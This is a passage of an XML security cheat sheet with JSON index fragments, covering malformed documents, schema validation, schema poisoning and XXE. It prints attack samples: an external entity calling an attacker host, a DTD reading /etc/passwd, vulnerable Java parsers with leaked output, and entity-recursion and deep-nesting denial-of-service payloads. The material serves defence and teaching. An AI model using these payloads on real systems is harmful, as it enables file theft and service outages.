Certain XML parsers have the ability to recover malformed documents. They can be instructed to try their best to return a valid tree with all the content that they can manage to parse, regardless of the document's noncompliance with the specifications. Since there are no predefined rules for the recovery process, the approach and results may not always be the same. Using malformed documents might lead to unexpected issues related to data integrity.

The following two scenarios illustrate attack vectors a parser will analyze in recovery mode:

"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#malformed-document-to-malformed-document","title":"Malformed Document to Malformed Document","text":"

According to the XML specification, the string -- (double-hyphen) must not occur within comments. Using the recovery mode of lxml and PHP, the following document will remain the same after being recovered:

<element>\n<!-- one\n  <!-- another comment\n comment -->\n</element>\n
"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#well-formed-document-to-well-formed-document-normalized","title":"Well-Formed Document to Well-Formed Document Normalized","text":"

Certain parsers may consider normalizing the contents of your CDATA sections. This means that they will update the special characters contained in the CDATA section to the safe versions of these characters, even though this is not required:

<element>\n<![CDATA[<script>a=1;</script>]]>\n</element>\n

Normalization of a CDATA section is not a common rule among parsers. Libxml could transform this document to its canonical version, but although well formed, its contents may be considered malformed depending on the situation:

<element>\n&lt;script&gt;a=1;&lt;/script&gt;\n</element>\n
"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#coercive-parsing","title":"Coercive Parsing","text":"

A coercive attack in XML involves parsing deeply nested XML documents without their corresponding ending tags. The idea is to make the victim use up, and eventually deplete, the machine's resources and cause a denial of service on the target. Reports of a DoS attack in Firefox 3.67 included the use of 30,000 open XML elements without their corresponding ending tags. Removing the closing tags simplifies the attack, since only half of the size of a well-formed document is required to accomplish the same results. The number of tags being processed eventually caused a stack overflow. A simplified version of such a document would look like this:

<A1>\n<A2>\n<A3>\n...\n    <A30000>\n
"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#violation-of-xml-specification-rules","title":"Violation of XML Specification Rules","text":"

Unexpected consequences may result from manipulating documents using parsers that do not follow W3C specifications. It may be possible to achieve crashes and/or code execution when the software does not properly verify how to handle incorrect XML structures. Feeding the software with fuzzed XML documents may expose this behavior.

"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#invalid-xml-documents","title":"Invalid XML Documents","text":"

Attackers may introduce unexpected values in documents to take advantage of an application that does not verify whether the document contains a valid set of values. Schemas specify restrictions that help identify whether documents are valid. A valid document is well formed and complies with the restrictions of a schema, and more than one schema can be used to validate a document. These restrictions may appear in multiple files, either using a single schema language or relying on the strengths of the different schema languages.

The recommendation to avoid these vulnerabilities is that each XML document must have a precisely defined XML Schema (not DTD) with every piece of information properly restricted to avoid problems of improper data validation. Use a local copy or a known good repository instead of the schema reference supplied in the XML document. Also, perform an integrity check of the XML schema file being referenced, bearing in mind the possibility that the repository could be compromised. In cases where the XML documents are using remote schemas, configure servers to use only secure, encrypted communications to prevent attackers from eavesdropping on network traffic.
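As a hedged sketch of that recommendation in Java (the file paths are hypothetical, and the external-access properties assume a JAXP 1.5+ runtime), validation can be performed against a local, integrity-checked copy of the schema while refusing to fetch external DTDs or schemas:

import java.io.File;
import javax.xml.XMLConstants;
import javax.xml.transform.stream.StreamSource;
import javax.xml.validation.Schema;
import javax.xml.validation.SchemaFactory;
import javax.xml.validation.Validator;

public class ValidateAgainstLocalSchema {
    public static void main(String[] args) throws Exception {
        // Load a local, previously verified copy of the schema instead of the
        // schema reference supplied inside the incoming XML document.
        SchemaFactory schemaFactory = SchemaFactory.newInstance(XMLConstants.W3C_XML_SCHEMA_NS_URI);
        Schema schema = schemaFactory.newSchema(new File("schemas/local-copy.xsd")); // hypothetical path

        Validator validator = schema.newValidator();
        // Refuse to resolve any external DTDs or schemas during validation.
        validator.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, "");
        validator.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, "");

        // Throws an exception if the document is not valid against the local schema.
        validator.validate(new StreamSource(new File("incoming.xml"))); // hypothetical path
        System.out.println("Document is valid against the local schema copy");
    }
}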

"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#document-without-schema","title":"Document without Schema","text":"

Consider a bookseller that uses a web service through a web interface to make transactions. The XML document for transactions is composed of two elements: an id value related to an item and a certain price. The user may only introduce a certain id value using the web interface:

<buy>\n<id>123</id>\n<price>10</price>\n</buy>\n

If there is no control on the document's structure, the application could also process different well-formed messages with unintended consequences. The previous document could have contained additional tags to affect the behavior of the underlying application processing its contents:

<buy>\n<id>123</id><price>0</price><id></id>\n<price>10</price>\n</buy>\n

Notice again how the value 123 is supplied as an id, but now the document includes additional opening and closing tags. The attacker closes the id element and sets a bogus price element to the value 0. The final step to keep the structure well formed is to add one empty id element. After this, the application adds the closing tag for id and sets the price to 10. If the application processes only the first values provided for the id and the price without performing any control on the structure, it could benefit the attacker by providing the ability to buy a book without actually paying for it.
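To make the mechanism concrete, here is a minimal sketch (not from the cheat sheet; the class name is illustrative) of naive code that simply takes the first id and price it finds, and therefore sees id=123 with price=0 when fed the attacker's document:

import java.io.StringReader;
import javax.xml.parsers.DocumentBuilderFactory;
import org.w3c.dom.Document;
import org.xml.sax.InputSource;

public class FirstValueOnly {
    public static void main(String[] args) throws Exception {
        String attack = "<buy><id>123</id><price>0</price><id></id><price>10</price></buy>";
        Document doc = DocumentBuilderFactory.newInstance()
                .newDocumentBuilder()
                .parse(new InputSource(new StringReader(attack)));

        // Naive handling: take the first occurrence of each element without
        // checking the document structure against a schema.
        String id = doc.getElementsByTagName("id").item(0).getTextContent();
        String price = doc.getElementsByTagName("price").item(0).getTextContent();
        System.out.println("id=" + id + ", price=" + price); // prints id=123, price=0
    }
}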

"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#unrestrictive-schema","title":"Unrestrictive Schema","text":"

Certain schemas do not offer enough restrictions for the type of data that each element can receive. This is what normally happens when using a DTD; it has a very limited set of possibilities compared to the types of restrictions that can be applied with XML Schema. This could expose the application to undesired values within elements or attributes that would be easy to constrain when using other schema languages. In the following example, a person's age is validated against an inline DTD schema:

<!DOCTYPE person [\n <!ELEMENT person (name, age)>\n<!ELEMENT name (#PCDATA)>\n<!ELEMENT age (#PCDATA)>\n]>\n<person>\n<name>John Doe</name>\n<age>11111..(1.000.000digits)..11111</age>\n</person>\n

The previous document contains an inline DTD with a root element named person. This element contains two elements in a specific order: name and then age. The element name is then defined to contain PCDATA as well as the element age. After this definition begins the well-formed and valid XML document. The element name contains an irrelevant value but the age element contains one million digits. Since there are no restrictions on the maximum size for the age element, this one-million-digit string could be sent to the server for this element. Typically this type of element should be restricted to contain no more than a certain amount of characters and constrained to a certain set of characters (for example, digits from 0 to 9, the + sign and the - sign). If not properly restricted, applications may handle potentially invalid values contained in documents. Since it is not possible to indicate specific restrictions (a maximum length for the element name or a valid range for the element age), this type of schema increases the risk of affecting the integrity and availability of resources.

"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#improper-data-validation","title":"Improper Data Validation","text":"

When schemas are insecurely defined and do not provide strict rules, they may expose the application to diverse situations. The result could be the disclosure of internal errors, or the processing of documents that affect the application's functionality with unexpected values.

"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#string-data-types","title":"String Data Types","text":"

If you need to use a hexadecimal value, there is no point in defining it as a generic string that will only later be restricted to the 16 hexadecimal characters. To exemplify this scenario, when using XML encryption some values must be encoded using base64. This is the schema definition of how these values should look:

<element name=\"CipherData\" type=\"xenc:CipherDataType\"/>\n<complexType name=\"CipherDataType\">\n<choice>\n<element name=\"CipherValue\" type=\"base64Binary\"/>\n<element ref=\"xenc:CipherReference\"/>\n</choice>\n</complexType>\n

The previous schema defines the element CipherValue as a base64 data type. As an example, the IBM WebSphere DataPower SOA Appliance allowed any type of characters within this element after a valid base64 value, and considered it valid. The first portion of this data is properly checked as a base64 value, but the remaining characters could be anything else (including other sub-elements of the CipherData element). Restrictions are only partially set for the element, which means that the information is probably validated by the application itself instead of the proposed sample schema.

"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#numeric-data-types","title":"Numeric Data Types","text":"

Defining the correct data type for numbers can be more complex since there are more options than there are for strings.

"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#negative-and-positive-restrictions","title":"Negative and Positive Restrictions","text":"

XML Schema numeric data types can cover different ranges of numbers: some allow negative values, some allow zero, and some allow only positive values.

The following sample document defines an id for a product, a price, and a quantity value that is under the control of an attacker:

<buy>\n<id>1</id>\n<price>10</price>\n<quantity>1</quantity>\n</buy>\n

To avoid repeating old errors, an XML schema may be defined to prevent processing the incorrect structure in cases where an attacker wants to introduce additional elements:

<xs:schema xmlns:xs=\"http://www.w3.org/2001/XMLSchema\">\n<xs:element name=\"buy\">\n<xs:complexType>\n<xs:sequence>\n<xs:element name=\"id\" type=\"xs:integer\"/>\n<xs:element name=\"price\" type=\"xs:decimal\"/>\n<xs:element name=\"quantity\" type=\"xs:integer\"/>\n</xs:sequence>\n</xs:complexType>\n</xs:element>\n</xs:schema>\n

Limiting that quantity to an integer data type will avoid any unexpected characters. Once the application receives the previous message, it may calculate the final price by doing price*quantity. However, since this data type may allow negative values, an attacker providing a negative number could produce a negative result on the user's account. What you probably want here, to avoid that logical vulnerability, is positiveInteger instead of integer.

"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#divide-by-zero","title":"Divide by Zero","text":"

Whenever user-controlled values are used as denominators in a division, developers should avoid allowing the number zero. In cases where the value zero is used for division in XSLT, the error FOAR0001 will occur. Other applications may throw other exceptions and the program may crash. There are XML Schema data types that specifically exclude the zero value. For example, in cases where negative values and zero are not considered valid, the schema could specify the data type positiveInteger for the element.

<xs:element name=\"denominator\">\n<xs:simpleType>\n<xs:restriction base=\"xs:positiveInteger\"/>\n</xs:simpleType>\n</xs:element>\n

The element denominator is now restricted to positive integers. This means that only values greater than zero will be considered valid. If any other type of restriction is used (one that still allows zero), a zero denominator may trigger an error.

"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#special-values-infinity-and-not-a-number-nan","title":"Special Values: Infinity and Not a Number (NaN)","text":"

The data types float and double contain real numbers and some special values: -Infinity or -INF, NaN, and +Infinity or INF. These possibilities may be useful to express certain values, but they are sometimes misused. The problem is that these types are commonly used for values that should only ever be plain real numbers, such as prices. This is a common error seen in other programming languages as well, not solely restricted to these technologies. Not considering the whole spectrum of possible values for a data type could make underlying applications fail. If the special values Infinity and NaN are not required and only real numbers are expected, the data type decimal is recommended:

<xs:schema xmlns:xs=\"http://www.w3.org/2001/XMLSchema\">\n<xs:element name=\"buy\">\n<xs:complexType>\n<xs:sequence>\n<xs:element name=\"id\" type=\"xs:integer\"/>\n<xs:element name=\"price\" type=\"xs:decimal\"/>\n<xs:element name=\"quantity\" type=\"xs:positiveInteger\"/>\n</xs:sequence>\n</xs:complexType>\n</xs:element>\n</xs:schema>\n

With the decimal type, a price set to Infinity or NaN will simply be rejected as invalid, so those special values never reach the application. An attacker can only exploit this issue if those values are allowed.

"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#general-data-restrictions","title":"General Data Restrictions","text":"

After selecting the appropriate data type, developers may apply additional restrictions. Sometimes only a certain subset of values within a data type will be considered valid, as described in the following subsections.

"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#prefixed-values","title":"Prefixed Values","text":"

Certain types of values should be restricted to specific sets: traffic lights will have only three types of colors, only 12 months are available, and so on. It is possible that the schema has these restrictions in place for each element or attribute. This is the ideal allow-list scenario for an application: only specific values will be accepted. Such a constraint is called an enumeration in XML Schema. The following example restricts the contents of the element month to 12 possible values:

<xs:element name=\"month\">\n<xs:simpleType>\n<xs:restriction base=\"xs:string\">\n<xs:enumeration value=\"January\"/>\n<xs:enumeration value=\"February\"/>\n<xs:enumeration value=\"March\"/>\n<xs:enumeration value=\"April\"/>\n<xs:enumeration value=\"May\"/>\n<xs:enumeration value=\"June\"/>\n<xs:enumeration value=\"July\"/>\n<xs:enumeration value=\"August\"/>\n<xs:enumeration value=\"September\"/>\n<xs:enumeration value=\"October\"/>\n<xs:enumeration value=\"November\"/>\n<xs:enumeration value=\"December\"/>\n</xs:restriction>\n</xs:simpleType>\n</xs:element>\n

By limiting the month element's value to any of the previous values, the application will not be manipulating random strings.

"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#ranges","title":"Ranges","text":"

Software applications, databases, and programming languages normally store information within specific ranges. Whenever using an element or an attribute in locations where certain specific sizes matter (to avoid overflows or underflows), it would be logical to check whether the data length is considered valid. The following schema could constrain a name using a minimum and a maximum length to avoid unusual scenarios:

<xs:element name=\"name\">\n<xs:simpleType>\n<xs:restriction base=\"xs:string\">\n<xs:minLength value=\"3\"/>\n<xs:maxLength value=\"256\"/>\n</xs:restriction>\n</xs:simpleType>\n</xs:element>\n

In cases where the possible values are restricted to a certain specific length (let's say 8), this value can be specified as follows to be valid:

<xs:element name=\"name\">\n<xs:simpleType>\n<xs:restriction base=\"xs:string\">\n<xs:length value=\"8\"/>\n</xs:restriction>\n</xs:simpleType>\n</xs:element>\n
"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#patterns","title":"Patterns","text":"

Certain elements or attributes may follow a specific syntax. You can add pattern restrictions when using XML schemas. When you want to ensure that the data complies with a specific pattern, you can create a specific definition for it. Social security numbers (SSN) may serve as a good example; they must use a specific set of characters, a specific length, and a specific pattern:

<xs:element name=\"SSN\">\n<xs:simpleType>\n<xs:restriction base=\"xs:token\">\n<xs:pattern value=\"[0-9]{3}-[0-9]{2}-[0-9]{4}\"/>\n</xs:restriction>\n</xs:simpleType>\n</xs:element>\n

Only numbers between 000-00-0000 and 999-99-9999 will be allowed as values for an SSN.

"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#assertions","title":"Assertions","text":"

Assertion components constrain the existence and values of related elements and attributes on XML schemas. An element or attribute will be considered valid with regard to an assertion only if the test evaluates to true without raising any error. The variable $value can be used to reference the contents of the value being analyzed. The Divide by Zero section above referenced the potential consequences of using data types containing the zero value for denominators, proposing a data type containing only positive values. An opposite approach would treat the entire range of numbers as valid, except zero. To avoid disclosing potential errors, values could be checked using an assertion that disallows the number zero:

<xs:element name=\"denominator\">\n<xs:simpleType>\n<xs:restriction base=\"xs:integer\">\n<xs:assertion test=\"$value != 0\"/>\n</xs:restriction>\n</xs:simpleType>\n</xs:element>\n

The assertion guarantees that zero will not be accepted as a valid denominator, while still allowing negative numbers to be valid denominators.

"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#occurrences","title":"Occurrences","text":"

Failing to define a maximum number of occurrences forces the application to cope with whatever happens when it receives an extreme number of items to be processed. Two attributes specify minimum and maximum limits: minOccurs and maxOccurs. The default value for both the minOccurs and the maxOccurs attributes is 1, but certain elements may require other values. For instance, if a value is optional, it could contain a minOccurs of 0, and if there is no limit on the maximum amount, it could contain a maxOccurs of unbounded, as in the following example:

<xs:schema xmlns:xs=\"http://www.w3.org/2001/XMLSchema\">\n<xs:element name=\"operation\">\n<xs:complexType>\n<xs:sequence>\n<xs:element name=\"buy\" maxOccurs=\"unbounded\">\n<xs:complexType>\n<xs:all>\n<xs:element name=\"id\" type=\"xs:integer\"/>\n<xs:element name=\"price\" type=\"xs:decimal\"/>\n<xs:element name=\"quantity\" type=\"xs:integer\"/>\n</xs:all>\n</xs:complexType>\n</xs:element>\n</xs:complexType>\n</xs:element>\n</xs:schema>\n

The previous schema includes a root element named operation, which can contain an unlimited (unbounded) number of buy elements. This is a common finding, since developers do not normally want to restrict maximum numbers of occurrences. Applications using limitless occurrences should test what happens when they receive an extremely large number of elements to be processed. Since computational resources are limited, the consequences should be analyzed and eventually a maximum number ought to be used instead of an unbounded value.
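One way to run such a test is to generate a document with a configurable number of repeated elements and observe how memory and processing time grow. The following sketch (illustrative only, reusing the buy element from the schema above) builds such a payload:

public class OccurrenceStressPayload {
    public static void main(String[] args) {
        int count = 100_000; // number of repeated buy elements to test with
        StringBuilder sb = new StringBuilder("<operation>");
        for (int i = 0; i < count; i++) {
            sb.append("<buy><id>1</id><price>10</price><quantity>1</quantity></buy>");
        }
        sb.append("</operation>");
        // Feed the resulting document to the application under test and observe
        // CPU and memory consumption as 'count' grows.
        System.out.println("Generated payload of " + sb.length() + " characters");
    }
}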

"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#jumbo-payloads","title":"Jumbo Payloads","text":"

Sending an XML document of 1GB requires only a second of server processing and might not be worth consideration as an attack. Instead, an attacker would look for a way to minimize the CPU and traffic used to generate this type of attack, compared to the overall amount of server CPU or traffic used to handle the requests.

"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#traditional-jumbo-payloads","title":"Traditional Jumbo Payloads","text":"

A document can be made larger than normal in two primary ways: by using extremely long names and values for its elements and attributes, or by including an extremely large number of them.

In most cases, the overall result will be a huge document. This is a short example of what this looks like:

<SOAPENV:ENVELOPE XMLNS:SOAPENV=\"HTTP://SCHEMAS.XMLSOAP.ORG/SOAP/ENVELOPE/\"\nXMLNS:EXT=\"HTTP://COM/IBM/WAS/WSSAMPLE/SEI/ECHO/B2B/EXTERNAL\">\n<SOAPENV:HEADER LARGENAME1=\"LARGEVALUE\"\nLARGENAME2=\"LARGEVALUE2\"\nLARGENAME3=\"LARGEVALUE3\" \u2026>\n...\n
"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#small-jumbo-payloads","title":"\"Small\" Jumbo Payloads","text":"

The following example is a very small document, but the results of processing this could be similar to those of processing traditional jumbo payloads. The purpose of such a small payload is that it allows an attacker to send many documents fast enough to make the application consume most or all of the available resources:

<?xml version=\"1.0\"?>\n<!DOCTYPE root [\n <!ENTITY file SYSTEM \"http://attacker/huge.xml\" >\n]>\n<root>&file;</root>\n
"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#schema-poisoning","title":"Schema Poisoning","text":"

When an attacker is capable of introducing modifications to a schema, there could be multiple high-risk consequences. In particular, the effect of these consequences will be more dangerous if the schemas are using DTD (e.g., file retrieval, denial of service). An attacker could exploit this type of vulnerability in numerous scenarios, always depending on the location of the schema.

"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#local-schema-poisoning","title":"Local Schema Poisoning","text":"

Local schema poisoning happens when schemas are available on the same host, whether or not the schemas are embedded in the same XML document.

"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#embedded-schema","title":"Embedded Schema","text":"

The most trivial type of schema poisoning takes place when the schema is defined within the same XML document. Consider the following, unknowingly vulnerable example provided by the W3C:

<?xml version=\"1.0\"?>\n<!DOCTYPE note [\n <!ELEMENT note (to,from,heading,body)>\n<!ELEMENT to (#PCDATA)>\n<!ELEMENT from (#PCDATA)>\n<!ELEMENT heading (#PCDATA)>\n<!ELEMENT body (#PCDATA)>\n]>\n<note>\n<to>Tove</to>\n<from>Jani</from>\n<heading>Reminder</heading>\n<body>Don't forget me this weekend</body>\n</note>\n

All restrictions on the note element could be removed or altered, allowing the sending of any type of data to the server. Furthermore, if the server is processing external entities, the attacker could use the schema, for example, to read remote files from the server. This type of schema only serves as a suggestion for sending a document, but it must contain a way to check the embedded schema integrity to be used safely. Attacks through embedded schemas are commonly used to exploit external entity expansions. Embedded XML schemas can also assist in port scans of internal hosts or brute force attacks.

"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#incorrect-permissions","title":"Incorrect Permissions","text":"

You can often circumvent the risk of using remotely tampered versions by processing a local schema.

<!DOCTYPE note SYSTEM \"note.dtd\">\n<note>\n<to>Tove</to>\n<from>Jani</from>\n<heading>Reminder</heading>\n<body>Don't forget me this weekend</body>\n</note>\n

However, if the local schema does not contain the correct permissions, an internal attacker could alter the original restrictions. The following line exemplifies a schema using permissions that allow any user to make modifications:

-rw-rw-rw-  1 user  staff  743 Jan 15 12:32 note.dtd\n

The permissions set on note.dtd allow any user on the system to make modifications. This vulnerability is clearly not related to the structure of an XML document or a schema, but since these documents are commonly stored in the filesystem, it is worth mentioning that an attacker could exploit this type of problem.

"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#remote-schema-poisoning","title":"Remote Schema Poisoning","text":"

Schemas defined by external organizations are normally referenced remotely. If capable of diverting or accessing the network's traffic, an attacker could cause a victim to fetch a distinct type of content rather than the one originally intended.

"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#man-in-the-middle-mitm-attack","title":"Man-in-the-Middle (MitM) Attack","text":"

When documents reference remote schemas using the unencrypted Hypertext Transfer Protocol (HTTP), the communication is performed in plain text and an attacker could easily tamper with traffic. When XML documents reference remote schemas using an HTTP connection, the connection could be sniffed and modified before reaching the end user:

<!DOCTYPE note SYSTEM \"http://example.com/note.dtd\">\n<note>\n<to>Tove</to>\n<from>Jani</from>\n<heading>Reminder</heading>\n<body>Don't forget me this weekend</body>\n</note>\n

The remote file note.dtd could be susceptible to tampering when transmitted using the unencrypted HTTP protocol. One tool available to facilitate this type of attack is mitmproxy.

"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#dns-cache-poisoning","title":"DNS-Cache Poisoning","text":"

Remote schema poisoning may also be possible even when using encrypted protocols like Hypertext Transfer Protocol Secure (HTTPS). When software performs reverse Domain Name System (DNS) resolution on an IP address to obtain the hostname, it may not properly ensure that the IP address is truly associated with the hostname. In this case, the software enables an attacker to redirect content to their own Internet Protocol (IP) addresses.

The previous example referenced the host example.com using an unencrypted protocol.

When switching to HTTPS, the location of the remote schema will look like https://example.com/note.dtd. In a normal scenario, the IP of example.com resolves to 1.1.1.1:

$\u00a0host\u00a0example.com\nexample.com\u00a0has\u00a0address\u00a01.1.1.1\n

If an attacker compromises the DNS being used, the previous hostname could now point to a new, different IP controlled by the attacker, 2.2.2.2:

$\u00a0host\u00a0example.com\nexample.com\u00a0has\u00a0address\u00a02.2.2.2\n

When accessing the remote file, the victim may be actually retrieving the contents of a location controlled by an attacker.

"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#evil-employee-attack","title":"Evil Employee Attack","text":"

When third parties host and define schemas, the contents are not under the control of the schemas' users. Any modifications introduced by a malicious employee (or by an external attacker in control of these files) could impact all users processing the schemas. Subsequently, attackers could affect the confidentiality, integrity, or availability of other services (especially if the schema in use is a DTD).

"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#xml-entity-expansion","title":"XML Entity Expansion","text":"

If the parser uses a DTD, an attacker might inject data that may adversely affect the XML parser during document processing. These adverse effects could include the parser crashing or accessing local files.

"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#sample-vulnerable-java-implementations","title":"Sample Vulnerable Java Implementations","text":"

Using the DTD's ability to reference local or remote files, it is possible to affect confidentiality. In addition, it is also possible to affect the availability of resources if no proper restrictions have been set for entity expansion. Consider the following example of an XXE attack.

Sample XML:

<!DOCTYPE contacts SYSTEM \"contacts.dtd\">\n<contacts>\n<contact>\n<firstname>John</firstname>\n<lastname>&xxe;</lastname>\n</contact>\n</contacts>\n

Sample DTD:

<!ELEMENT contacts (contact*)>\n<!ELEMENT contact (firstname,lastname)>\n<!ELEMENT firstname (#PCDATA)>\n<!ELEMENT lastname ANY>\n<!ENTITY xxe SYSTEM \"/etc/passwd\">\n
"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#xxe-using-dom","title":"XXE using DOM","text":"
import java.io.IOException;\nimport javax.xml.parsers.DocumentBuilder;\nimport javax.xml.parsers.DocumentBuilderFactory;\nimport javax.xml.parsers.ParserConfigurationException;\nimport org.xml.sax.InputSource;\nimport org.w3c.dom.Document;\nimport org.w3c.dom.Element;\nimport org.w3c.dom.Node;\nimport org.w3c.dom.NodeList;\n\npublic class parseDocument {\npublic static void main(String[] args) {\ntry {\nDocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();\nDocumentBuilder builder = factory.newDocumentBuilder();\nDocument doc = builder.parse(new InputSource(\"contacts.xml\"));\nNodeList nodeList = doc.getElementsByTagName(\"contact\");\nfor (int s = 0; s < nodeList.getLength(); s++) {\nNode firstNode = nodeList.item(s);\nif (firstNode.getNodeType() == Node.ELEMENT_NODE) {\nElement firstElement = (Element) firstNode;\nNodeList firstNameElementList = firstElement.getElementsByTagName(\"firstname\");\nElement firstNameElement = (Element) firstNameElementList.item(0);\nNodeList firstName = firstNameElement.getChildNodes();\nSystem.out.println(\"First Name: \"  + ((Node) firstName.item(0)).getNodeValue());\nNodeList lastNameElementList = firstElement.getElementsByTagName(\"lastname\");\nElement lastNameElement = (Element) lastNameElementList.item(0);\nNodeList lastName = lastNameElement.getChildNodes();\nSystem.out.println(\"Last Name: \" + ((Node) lastName.item(0)).getNodeValue());\n}\n}\n} catch (Exception e) {\ne.printStackTrace();\n}\n}\n}\n

The previous code produces the following output:

$ javac parseDocument.java ; java parseDocument\nFirst Name: John\nLast Name: ### User Database\n...\nnobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false\nroot:*:0:0:System Administrator:/var/root:/bin/sh\n
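For contrast, a hedged variant of the DOM example above (not part of the original sample code) shows how the same factory can be configured so that the DOCTYPE pointing at contacts.dtd is rejected before any entity is expanded. The disallow-doctype-decl feature is an Apache Xerces feature string and may not be supported by every parser:

import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import org.w3c.dom.Document;
import org.xml.sax.InputSource;

public class parseDocumentHardened {
    public static void main(String[] args) throws Exception {
        DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
        // Reject any document containing a DOCTYPE declaration, so contacts.dtd is never loaded.
        factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        // Additional hardening for parsers that do not support the feature above.
        factory.setXIncludeAware(false);
        factory.setExpandEntityReferences(false);

        DocumentBuilder builder = factory.newDocumentBuilder();
        // With the settings above, parsing the sample contacts.xml fails fast with a
        // parse exception instead of expanding &xxe; into the contents of /etc/passwd.
        Document doc = builder.parse(new InputSource("contacts.xml"));
        System.out.println("Parsed without a DOCTYPE: " + doc.getDocumentElement().getNodeName());
    }
}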
"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#xxe-using-dom4j","title":"XXE using DOM4J","text":"
import org.dom4j.Document;\nimport org.dom4j.DocumentException;\nimport org.dom4j.io.SAXReader;\nimport org.dom4j.io.OutputFormat;\nimport org.dom4j.io.XMLWriter;\n\npublic class test1 {\npublic static void main(String[] args) {\nDocument document = null;\ntry {\nSAXReader reader = new SAXReader();\ndocument = reader.read(\"contacts.xml\");\n} catch (Exception e) {\ne.printStackTrace();\n}\nOutputFormat format = OutputFormat.createPrettyPrint();\ntry {\nXMLWriter writer = new XMLWriter( System.out, format );\nwriter.write( document );\n} catch (Exception e) {\ne.printStackTrace();\n}\n}\n}\n

The previous code produces the following output:

$ java test1\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<!DOCTYPE contacts SYSTEM \"contacts.dtd\">\n\n<contacts>\n <contact>\n  <firstname>John</firstname>\n  <lastname>### User Database\n...\nnobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false\nroot:*:0:0:System Administrator:/var/root:/bin/sh\n
"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#xxe-using-sax","title":"XXE using SAX","text":"
import java.io.IOException;\nimport javax.xml.parsers.SAXParser;\nimport javax.xml.parsers.SAXParserFactory;\nimport org.xml.sax.SAXException;\nimport org.xml.sax.helpers.DefaultHandler;\n\npublic class parseDocument extends DefaultHandler {\npublic static void main(String[] args) {\nnew parseDocument();\n}\npublic parseDocument() {\ntry {\nSAXParserFactory factory = SAXParserFactory.newInstance();\nSAXParser parser = factory.newSAXParser();\nparser.parse(\"contacts.xml\", this);\n} catch (Exception e) {\ne.printStackTrace();\n}\n}\n@Override\npublic void characters(char[] ac, int i, int j) throws SAXException {\nString tmpValue = new String(ac, i, j);\nSystem.out.println(tmpValue);\n}\n}\n

The previous code produces the following output:

$ java parseDocument\nJohn\n#### User Database\n...\nnobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false\nroot:*:0:0:System Administrator:/var/root:/bin/sh\n
"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#xxe-using-stax","title":"XXE using StAX","text":"
import javax.xml.parsers.SAXParserFactory;\nimport javax.xml.stream.XMLStreamReader;\nimport javax.xml.stream.XMLInputFactory;\nimport java.io.File;\nimport java.io.FileReader;\nimport java.io.FileInputStream;\n\npublic class parseDocument {\npublic static void main(String[] args) {\ntry {\nXMLInputFactory xmlif = XMLInputFactory.newInstance();\nFileReader fr = new FileReader(\"contacts.xml\");\nFile file = new File(\"contacts.xml\");\nXMLStreamReader xmlfer = xmlif.createXMLStreamReader(\"contacts.xml\",\nnew FileInputStream(file));\nint eventType = xmlfer.getEventType();\nwhile (xmlfer.hasNext()) {\neventType = xmlfer.next();\nif(xmlfer.hasText()){\nSystem.out.print(xmlfer.getText());\n}\n}\nfr.close();\n} catch (Exception e) {\ne.printStackTrace();\n}\n}\n}\n

The previous code produces the following output:

$ java parseDocument\n<!DOCTYPE contacts SYSTEM \"contacts.dtd\">John### User Database\n...\nnobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false\nroot:*:0:0:System Administrator:/var/root:/bin/sh\n
"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#recursive-entity-reference","title":"Recursive Entity Reference","text":"

When the definition of entity A references entity B, and entity B in turn references entity A, the schema describes a circular reference between entities:

<!DOCTYPE A [\n <!ELEMENT A ANY>\n<!ENTITY A \"<A>&B;</A>\">\n <!ENTITY B \"&A;\">\n]>\n<A>&A;</A>\n
"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#quadratic-blowup","title":"Quadratic Blowup","text":"

Instead of defining multiple small, deeply nested entities, the attacker in this scenario defines one very large entity and refers to it as many times as possible, resulting in a quadratic expansion (O(n^2)).

The result of the following attack will be 100,000 x 100,000 (roughly 10^10) characters in memory.

